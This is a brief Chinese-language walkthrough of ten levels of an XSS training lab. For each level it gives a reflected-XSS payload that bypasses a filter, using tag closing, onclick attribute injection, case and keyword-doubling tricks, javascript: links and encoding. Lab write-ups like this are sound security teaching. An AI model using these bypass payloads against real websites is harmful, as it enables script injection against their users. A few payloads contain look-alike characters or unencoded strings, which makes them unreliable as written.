1,环境准备
2,登录xss-master-lab靶场
第一关,分析为xss反射型get请求;
可以在url中添加xss语句
第二关,发现value标签中有写的数据
构造闭合标签,把input标签闭合掉,然后写个script标签
'"><script>alert(123)</script>
第三关,发现有转义<>"符号的能力
所以使用单引号xss语句
第四关,通过源代码发现<>括号会转义,所以使用没有<>的语句
" οnclick="alert('xss')
第五关,发现对on事件做了过滤,将o使用了大写
可以使用闭合标签,在使用超链接
"><a href="javascript:alert('xss');">xss</a>
第六关,发现<>会进行转义,这里主要考验我们的大小写绕过
" ONcliCk="alert('xss')
第七关,第七关发现有on绕过,还有过滤on
可以使用" OONNcliCk="alert(123)
第八关,发现大小写绕过,标签闭合,xss字段做了处理,这时候可以使用编码绕过
将javascript:alert('xss')转换为ascii编码
javascript:alert('xss')
第九关,发现超链接进行了校验,可以利用ascii编码进行编码
javascript:alert("xss")// 进行编码,编码好以后,添加一个网页链接
第十关,所以针对name属性为t_sort的input标签进行注入,可以闭合属性,构造新的属性,同时把type="hidden"属性替换掉,要不然看不到页面效果,payload如下
t_sort='" type='text' οnclick='alert(123)'